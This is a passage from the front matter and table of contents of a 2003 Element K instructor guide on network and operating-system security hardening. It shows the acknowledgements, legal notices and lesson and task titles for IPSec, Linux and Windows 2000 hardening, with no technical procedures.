scnp hardening

629
Hardening The Infrastructure (SCP) INSTRUCTOR GUIDE DO NOT DUPLICATE Instructor Edition

Upload: manh-khoi

Post on 14-Dec-2014

181 views

Category:

Documents


10 download

TRANSCRIPT

Page 1: SCNP Hardening

Hardening The Infrastructure (SCP)

I N S T R U C T O R G U I D E

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 2: SCNP Hardening

Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 3: SCNP Hardening

HARDENING THE INFRASTRUCTURE (SCP)

Course Edition: 1.1For software version: NA

ACKNOWLEDGEMENTS

Project Team

Curriculum Developer and Technical Writers: Warren Peterson, Shrinath Tandur and Uday O. Ali Pabrai •Copy Editors: Carin Peterson and Laura Thomas • Reviewing Editor: Christy D. Johnson • Technical Editors:Charles Nicchia and Cory Brown • Quality Assurance Analysts: Tracy Andrews, Frank Wosnick and LanceAnderson • Graphics Designer: Isolina Salgado Toner

Project Support

Development Assistance: Robert Young, David Young, Steve Richter and Pamela J. Taylor • ContentManager: Clare Dygert

NOTICESDISCLAIMER: While Element K Press LLC takes care to ensure the accuracy and quality of these materials, we cannot guarantee their accuracy, and all materials areprovided without any warranty whatsoever, including, but not limited to, the implied warranties of merchantability or fitness for a particular purpose. The names and IPaddresses used in the data files for this course are those of a fictitious company. Any resemblance to current or future companies is purely coincidental. We do not believe wehave used anyone’s name or IP address in creating this course, but if we have, please notify us and we will change the name in the next revision of the course. Element K isan independent provider of integrated training solutions for individuals, businesses, educational institutions, and government agencies. Use of screenshots, photographs ofanother entity’s products, or another entity’s product name or service in this book is for editorial purposes only. No such use should be construed to imply sponsorship orendorsement of the book by, nor any affiliation of such entity with Element K. Some of the tools and procedures presented in this course could cause problems if usedimproperly or maliciously in a live network environment. These tools are not a threat in any simulated activities presented here, nor are they a threat when presented as part ofinstructor-led training in a closed classroom environment. However, the installation and use of the programs or procedures presented outside of a controlled environment isthe sole responsibility of the end-user and may result in criminal prosecution. Element K does not endorse or recommend the illegal use of any of the scanning or hackingtools described in this course. This courseware contains links to sites on the Internet that are owned and operated by third parties (the“External Sites”). Element K is notresponsible for the availability of, or the content located on or through, any External Site. Please contact Element K if you have any concerns regarding such links or ExternalSites.

TRADEMARK NOTICES: Element K and the Element K logo are trademarks of Element K LLC. The Security Certified Program is a registered trademark of AscendantLearning, LLC, in the U.S. and other countries; the Security Certified Program products and services discussed or described may be trademarks of Ascendant Learning, LLC.All other product names and services used throughout this book may be common law or registered trademarks of their respective proprietors.

Copyright © 2003 Element K Content LLC. All rights reserved. Screenshots and IP addresses used for illustrative purposes are the property of the software proprietor. Thispublication, or any part thereof, may not be reproduced or transmitted in any form or by any means, electronic or mechanical, including photocopying, recording, storage inan information retrieval system, or otherwise, without express written permission of Element K, 500 Canal View Boulevard, Rochester, NY 14623, (585) 240-7500, (800) 434-3466. Element K Press LLC’s World Wide Web site is located at www.elementkcourseware.com.

The glossary contains terms from the National Security Agency (NSA) and is reprinted with permission. Reproduction of these terms in any format without the explicit writtenconsent of Element K or the NSA is strictly prohibited.

The section that discusses IIS 5 exploits and alerts has been printed with permission from eEye Digital Security. Copyright© 1998-2001 eEye Digital Security.

This book conveys no rights in the software or other products about which it was written; all use or licensing of such software or other products is the responsibility of theuser according to terms and conditions of the owner. Do not make illegal copies of books or software. If you believe that this book, related materials, or any other Element Kmaterials are being reproduced or transmitted without permission, please call 1-800-478-7788.

ii Hardening The Infrastructure (SCP)

Course Number: NH85545 (IGEE)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 4: SCNP Hardening

HARDENING THE INFRASTRUCTURE (SCP)

About This Course . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . xix

Lesson 1: Advanced TCP/IP . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1

Lesson 2: Implementing IPSec . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 77

Lesson 3: Hardening Linux Computers. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 137

Lesson 4: Hardening Windows Computers . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 235

Lesson 5: Routers and Access Control Lists . . . . . . . . . . . . . . . . . . . . . . . . . . . . 321

Lesson 6: Contingency Planning . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 379

Lesson 7: Security on the Internet and the WWW . . . . . . . . . . . . . . . . . . . . . . . . . 421

Lesson 8: Attack Techniques . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 481

Appendix A: Hardening the Infrastructure Exam Objectives . . . . . . . . . . . . . . . . . . 543

Glossary. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 549

Index . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 567

CONTENTOVERVIEW

Contents iii

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 5: SCNP Hardening

HARDENING THE INFRASTRUCTURE (SCP)

CONTENTSAbout This Course . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . xixCourse Setup Information . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . xxivHow To Use This Book. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . l

LESSON 1: ADVANCED TCP/IPTopic 1A TCP/IP Concepts . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3

RFCs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6The Function of IP. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7The Subnet Mask . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 10

Task 1A-1 Layering and Address Conversions. . . . . . . . . . . . . . . . . . . . 12Routing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 12VLSM and CIDR . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 13X-casting . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 14

Task 1A-2 Routers and Subnetting . . . . . . . . . . . . . . . . . . . . . . . . . . 14

Topic 1B Analyzing the Three-way Handshake . . . . . . . . . . . . . . . . . . . 16Connections. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 18Ports . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 20Network Monitor . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 22

Task 1B-1 Using Network Monitor . . . . . . . . . . . . . . . . . . . . . . . . . . . 27Ethereal . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 28

Task 1B-2 Installing and Starting Ethereal . . . . . . . . . . . . . . . . . . . . . 29Ethereal Overview . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 29

Task 1B-3 Using Ethereal. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 32TCP Connections . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 33

Task 1B-4 Analyzing the Three-way Handshake . . . . . . . . . . . . . . . . . . 33The Session Teardown Process . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 34

Task 1B-5 Analyzing the Session Teardown Process . . . . . . . . . . . . . . . 35

Topic 1C Capturing and Identifying IP Datagrams . . . . . . . . . . . . . . . . 35Task 1C-1 Capturing and Identifying IP Datagrams . . . . . . . . . . . . . . . 37

Topic 1D Capturing and Identifying ICMP Messages. . . . . . . . . . . . . . . 38Task 1D-1 Capturing and Identifying ICMP Messages . . . . . . . . . . . . . . 39

Topic 1E Capturing and Identifying TCP Headers . . . . . . . . . . . . . . . . . 40Task 1E-1 Capturing and Identifying TCP Headers . . . . . . . . . . . . . . . . 42

CONTENTS

iv Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 6: SCNP Hardening

Topic 1F Capturing and Identifying UDP Headers . . . . . . . . . . . . . . . . 43Task 1F-1 Working with UDP Headers . . . . . . . . . . . . . . . . . . . . . . . . 43

Topic 1G Analyzing Packet Fragmentation. . . . . . . . . . . . . . . . . . . . . . . 44Task 1G-1 Analyzing Fragmentation. . . . . . . . . . . . . . . . . . . . . . . . . . 45

Topic 1H Analyzing an Entire Session . . . . . . . . . . . . . . . . . . . . . . . . . . 46Task 1H-1 Performing a Complete ICMP Session Analysis . . . . . . . . . . . 46

Continuing the Complete Session Analysis . . . . . . . . . . . . . . . . . . . . . . 49Task 1H-2 Performing a Complete FTP Session Analysis. . . . . . . . . . . . . 50

Topic 1I Fundamentals of IPv6 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 62IPv6 Addresses . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 62Unicasting and Multicasting . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 63IPv6 Security . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 64

Task 1I-1 Installing IPv6 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 64IPv6 Interfaces . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 66

Task 1I-2 Getting Another 6-over-4 Address. . . . . . . . . . . . . . . . . . . . 68IPv6 Utilities . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 68

Task 1I-3 Interface Initializing . . . . . . . . . . . . . . . . . . . . . . . . . . . . 69Using the ipsec6.exe Command . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 69

Task 1I-4 Using the ipsec6 Command . . . . . . . . . . . . . . . . . . . . . . . . 69Using the ping6.exe Command . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 70

Task 1I-5 Using the ping6 Command . . . . . . . . . . . . . . . . . . . . . . . . 70Capturing and Analyzing IPv6 Traffic . . . . . . . . . . . . . . . . . . . . . . . . . . 71

Task 1I-6 Capturing and Analyzing IPv6 Traffic . . . . . . . . . . . . . . . . . 71Lesson Review 1 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 72

LESSON 2: IMPLEMENTING IPSEC

Topic 2A Internet Protocol Security . . . . . . . . . . . . . . . . . . . . . . . . . . . . 78Modes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 79IPSec Implementation. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 80

Task 2A-1 Describing the Need for IPSec . . . . . . . . . . . . . . . . . . . . . . 81

Topic 2B IPSec Policy Management. . . . . . . . . . . . . . . . . . . . . . . . . . . . . 81The MMC . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 81

Task 2B-1 Examining the MMC . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 82IPSec Policies . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 83

Task 2B-2 Identifying Default IPSec Security Policies. . . . . . . . . . . . . . 83Saving the Customized MMC Configuration . . . . . . . . . . . . . . . . . . . . . 84

Task 2B-3 Saving a Customized MMC . . . . . . . . . . . . . . . . . . . . . . . . . 84The Secure Server (Require Security) Policy . . . . . . . . . . . . . . . . . . . . . 84

Task 2B-4 Examining Security Methods . . . . . . . . . . . . . . . . . . . . . . . 85The Rules Tab for the Secure Server (Require Security) Policy. . . . . . . 86

Task 2B-5 Examining Policy Rules . . . . . . . . . . . . . . . . . . . . . . . . . . . 88

CONTENTS

Contents v

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 7: SCNP Hardening

Topic 2C IPSec AH Implementation . . . . . . . . . . . . . . . . . . . . . . . . . . . . 89Task 2C-1 Preparing the System Setup and Configuration . . . . . . . . . . . 90

Creating Custom IPSec Policies. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 90Task 2C-2 Creating the 1_REQUEST_AH(md5)_only Policy . . . . . . . . . . . 93

Editing Authentication Method Policies . . . . . . . . . . . . . . . . . . . . . . . . 95Task 2C-3 Editing the 1_REQUEST_AH(md5)_only Policy . . . . . . . . . . . . 95

Setting Up the Computer’s Response . . . . . . . . . . . . . . . . . . . . . . . . . . 96Task 2C-4 Configuring the Policy Response. . . . . . . . . . . . . . . . . . . . . 97

Configuring AH in Both Directions . . . . . . . . . . . . . . . . . . . . . . . . . . . . 98Task 2C-5 Configuring the Second Computer. . . . . . . . . . . . . . . . . . . . 98

Configuring FTP . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 99Task 2C-6 Setting Up the FTP Process . . . . . . . . . . . . . . . . . . . . . . . . 100

Implementing the IPSec Policy. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 100Task 2C-7 Implementing the 1_REQUEST_AH(md5)_only Policy . . . . . . . 101

Request-only Session Analysis . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 101Task 2C-8 Analyzing the Request-only Session . . . . . . . . . . . . . . . . . . 102

Implementing a Request-and-Respond Policy . . . . . . . . . . . . . . . . . . . 102Task 2C-9 Configuring a Request-and-Respond IPSec Session . . . . . . . . 102

Request-and-Respond Session Analysis . . . . . . . . . . . . . . . . . . . . . . . . 103Task 2C-10 Analyzing the Request-and-Respond Session . . . . . . . . . . . . 103

Implementing a Require IPSec Policy . . . . . . . . . . . . . . . . . . . . . . . . . . 104Task 2C-11 Implementing the 2_REQUIRE_AH(md5)_only Policy . . . . . . . 104

Mismatched AH Implementation. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 105Task 2C-12 Attempting to Use Different IPSec Policies . . . . . . . . . . . . . 106

Mismatched IPSec Session Analysis . . . . . . . . . . . . . . . . . . . . . . . . . . . 106Task 2C-13 Analyzing a Mismatched IPSec Policy Session. . . . . . . . . . . . 106

Implementing and Analyzing the Require Response Policy . . . . . . . . . 107Task 2C-14 Implementing and Analyzing a Require IPSec Policy Session. . 107

Topic 2D IPSec ESP Implementation. . . . . . . . . . . . . . . . . . . . . . . . . . . .108Implementing a Request ESP IPSec Policy . . . . . . . . . . . . . . . . . . . . . . 108

Task 2D-1 Creating the 3_REQUEST_ESP(des)_only IPSec Policy . . . . . . . 108Configuring the ESP IPSec Response . . . . . . . . . . . . . . . . . . . . . . . . . . 110

Task 2D-2 Creating the 3_RESPOND_ESP(des)_only IPSec Policy. . . . . . . 110ESP Request-and-Response Session Analysis . . . . . . . . . . . . . . . . . . . . 111

Task 2D-3 Enabling IPSec ESP Policies . . . . . . . . . . . . . . . . . . . . . . . . 112Implementing an ESP IPSec Session. . . . . . . . . . . . . . . . . . . . . . . . . . . 113

Task 2D-4 Configuring and Analyzing an ESP IPSec Session . . . . . . . . . 113ESP Analysis . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 114Creating a Require ESP IPSec Policy . . . . . . . . . . . . . . . . . . . . . . . . . . . 114

Task 2D-5 Implementing the 4_REQUIRE_ESP(des)_only IPSec Policy . . . 114Configuring a Require ESP IPSec Session . . . . . . . . . . . . . . . . . . . . . . . 115

Task 2D-6 Require-and-Respond ESP Implementation and Analysis . . . . . 116

Topic 2E Combining AH and ESP in IPSec . . . . . . . . . . . . . . . . . . . . . . .117Task 2E-1 Creating the 5_REQUEST_AH(md5)+ESP(des) IPSec Policy and

the Response Policy . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 117

CONTENTS

vi Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 8: SCNP Hardening

Configuring the IPSec Response . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 119Task 2E-2 Creating the 5_RESPOND_AH(md5)+ESP(des) IPSec Policy. . . . 119

AH and ESP IPSec Session Analysis. . . . . . . . . . . . . . . . . . . . . . . . . . . . 120Task 2E-3 Configuring and Analyzing an IPSec Session Using AH and ESP. 121

Requiring AH and ESP in an IPSec Session. . . . . . . . . . . . . . . . . . . . . . 122Task 2E-4 Creating the 6_REQUIRE_AH(md5)+ESP(des) IPSec Policy . . . . 123

Using Mismatched AH and ESP IPSec Policies . . . . . . . . . . . . . . . . . . . 124Task 2E-5 Matching and Analyzing AH and ESP IPSec Policies . . . . . . . . 124

Configuring All the Options . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 125Task 2E-6 Implementing the 7_REQUIRE_AH(sha)+ESP(sha+3des) Policy . 126

Configuring the AH-and-ESP IPSec Response Policy. . . . . . . . . . . . . . . 127Task 2E-7 Implementing the 7_RESPOND_AH(sha)+ESP(sha+3des) Policy. 127

Implementing the Full IPSec Session . . . . . . . . . . . . . . . . . . . . . . . . . . 128Task 2E-8 Implementing and Analyzing an AH(sha) and ESP(sha+3des)

IPSec Session . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 129Using the Filter Lists. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 129

Task 2E-9 Editing Filter Lists to Explicitly Secure Traffic . . . . . . . . . . . 130Using Certificates . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 132

Task 2E-10 Using Certificates for Authentication. . . . . . . . . . . . . . . . . . 132Disabling IPSec . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 134

Task 2E-11 Removing IPSec. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 134Lesson Review 2 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 135

LESSON 3: HARDENING LINUX COMPUTERS

Topic 3A Introduction to Linux Administration . . . . . . . . . . . . . . . . . .138Linux . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 139Basic Navigation in Linux . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 139

Task 3A-1 Navigating in Linux . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 145User and Group Accounts . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 146

Task 3A-2 Creating and Modifying Users and Groups . . . . . . . . . . . . . . 150Switching User Accounts. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 151Linux File System . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 151

Task 3A-3 Viewing File Details . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 156Object Ownership . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 156Webmin . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 157

Task 3A-4 Installing Webmin . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 158System Information. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 158

Task 3A-5 Viewing System Information . . . . . . . . . . . . . . . . . . . . . . . 162

Topic 3B Fundamental Linux Security . . . . . . . . . . . . . . . . . . . . . . . . . .162File and Directory Permissions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 162

Task 3B-1 Creating Object Ownerships . . . . . . . . . . . . . . . . . . . . . . . . 166Assigning Permissions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 167

Task 3B-2 Assigning Permissions. . . . . . . . . . . . . . . . . . . . . . . . . . . . 167Testing Assigned Permissions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 167

CONTENTS

Contents vii

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 9: SCNP Hardening

Task 3B-3 Verifying Permissions . . . . . . . . . . . . . . . . . . . . . . . . . . . . 168The SetUID, SetGID, and the Sticky Bit Permissions . . . . . . . . . . . . . . 169

Task 3B-4 Configuring umask Settings . . . . . . . . . . . . . . . . . . . . . . . . 172Password Security . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 172

Task 3B-5 Viewing the Password Files . . . . . . . . . . . . . . . . . . . . . . . . 176Managing Passwords . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 176

Task 3B-6 Managing Passwords. . . . . . . . . . . . . . . . . . . . . . . . . . . . . 177Pluggable Authentication Modules (PAM) . . . . . . . . . . . . . . . . . . . . . . 177Security Updates . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 182

Topic 3C Access Control . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .183TCP Wrappers . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 183

Task 3C-1 Controlling Access with TCP Wrappers . . . . . . . . . . . . . . . . . 187The xinetd Superdaemon. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 187

Task 3C-2 Managing Telnet with xinetd . . . . . . . . . . . . . . . . . . . . . . . 193

Topic 3D Securing Network Services. . . . . . . . . . . . . . . . . . . . . . . . . . . .194NFS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 194

Task 3D-1 Sharing Data with NFS . . . . . . . . . . . . . . . . . . . . . . . . . . . 200Securing NFS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 200

Task 3D-2 Verifying Export Permissions . . . . . . . . . . . . . . . . . . . . . . . 202NIS. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 202What is Samba? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 203

Task 3D-3 Configuring the Samba Server . . . . . . . . . . . . . . . . . . . . . . 207

Topic 3E Final OS Hardening . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .210Removing Services. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 211

Task 3E-1 Stopping Unneeded Services . . . . . . . . . . . . . . . . . . . . . . . 212Linux Run Levels . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 213SSH . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 213

Task 3E-2 Configuring an SSH Server. . . . . . . . . . . . . . . . . . . . . . . . . 214Configuring and Using the SSH Client . . . . . . . . . . . . . . . . . . . . . . . . . 214

Task 3E-3 Configuring an SSH Client . . . . . . . . . . . . . . . . . . . . . . . . . 215Tripwire . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 216

Task 3E-4 Starting Tripwire . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 220Logging . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 224

Task 3E-5 Logging Recent Login Activity . . . . . . . . . . . . . . . . . . . . . . 226The xferlog Log File . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 227Web Server Log Files . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 227The secure Log File . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 227Using the Log Viewer . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 228

Task 3E-6 Using the Log Viewer . . . . . . . . . . . . . . . . . . . . . . . . . . . . 228Securing Log Files . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 229Bastille . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 229

Task 3E-7 Installing and Exploring Bastille . . . . . . . . . . . . . . . . . . . . 231Lesson Review 3 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 232

CONTENTS

viii Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 10: SCNP Hardening

LESSON 4: HARDENING WINDOWS COMPUTERS

Topic 4A Windows 2000 Infrastructure Security. . . . . . . . . . . . . . . . . .236Active Directory Components . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 237Windows 2000 DNS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 241Group Policy Components . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 242Group Policy Implementation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 242

Task 4A-1 Configuring a Custom MMC and GPO . . . . . . . . . . . . . . . . . . 243Editing GPOs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 243

Task 4A-2 Editing a GPO . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 244Enforcing GPOs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 244

Task 4A-3 Implementing Multiple GPOs . . . . . . . . . . . . . . . . . . . . . . . 245

Topic 4B Windows 2000 Authentication . . . . . . . . . . . . . . . . . . . . . . . .246Authentication Methods . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 246SYSKEY. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 249The Challenge and Response. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 250Windows 2000 Local Logon Process . . . . . . . . . . . . . . . . . . . . . . . . . . . 250Kerberos in Windows 2000 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 251Smart Cards in Windows 2000. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 252

Task 4B-1 Configuring NTLMv2 Authentication . . . . . . . . . . . . . . . . . . 252

Topic 4C Windows 2000 Security Configuration Tools . . . . . . . . . . . . .253The Gold Standard . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 253User and Group Security . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 253Restricting Logon Hours . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 253Expiration Dates for User Accounts . . . . . . . . . . . . . . . . . . . . . . . . . . . 254Configuring Windows 2000 Groups . . . . . . . . . . . . . . . . . . . . . . . . . . . . 254Locking Down the Administrator Account . . . . . . . . . . . . . . . . . . . . . . 255

Task 4C-1 Securing Administrator Account Access . . . . . . . . . . . . . . . . 256Testing Administrative Access. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 258

Task 4C-2 Testing Administrative Access . . . . . . . . . . . . . . . . . . . . . . 258Group Policies . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 259Local Security Policy . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 260

Task 4C-3 Verifying Password Requirements . . . . . . . . . . . . . . . . . . . . 260Password Recommendations . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 261Security Templates . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 262

Task 4C-4 Analyzing Default Password Settings of Security Templates. . . 264Custom Security Templates . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 264

Task 4C-5 Creating a Custom Security Template . . . . . . . . . . . . . . . . . 264Security Configuration and Analysis Snap-In . . . . . . . . . . . . . . . . . . . . 265

Task 4C-6 Investigating the Security Configuration and Analysis Snap-In. 266Template Implementation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 266

Task 4C-7 Implementing the Template. . . . . . . . . . . . . . . . . . . . . . . . 267The secedit.exe Utility . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 267

Task 4C-8 Analyzing the Current Security Settings of the Local System. . 267

CONTENTS

Contents ix

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 11: SCNP Hardening

Analyzing and Implementing the Gold Standard . . . . . . . . . . . . . . . . . 268Task 4C-9 Configuring Policies to the Gold Standard . . . . . . . . . . . . . . 269

Analyzing the Gold Standard. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 269Task 4C-10 Analyzing the Gold Standard . . . . . . . . . . . . . . . . . . . . . . . 270

Topic 4D Windows 2000 Resource Security . . . . . . . . . . . . . . . . . . . . . .272Task 4D-1 Compromising NTFS Security . . . . . . . . . . . . . . . . . . . . . . . 275

The NULL Session . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 275Windows 2000 Printer Security . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 276Windows 2000 Registry Security. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 276Default Registry Configurations . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 277

Task 4D-2 Setting Registry Permissions . . . . . . . . . . . . . . . . . . . . . . . 278Registry Backup. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 278

Task 4D-3 Saving Registry Information . . . . . . . . . . . . . . . . . . . . . . . 278Blocking Access to the Registry . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 279

Task 4D-4 Blocking Registry Access. . . . . . . . . . . . . . . . . . . . . . . . . . 279System Hardening . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 280

Task 4D-5 Removing Unneeded Subsystems . . . . . . . . . . . . . . . . . . . . 283

Topic 4E Windows 2000 Auditing and Logging. . . . . . . . . . . . . . . . . . .283Object Auditing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 285

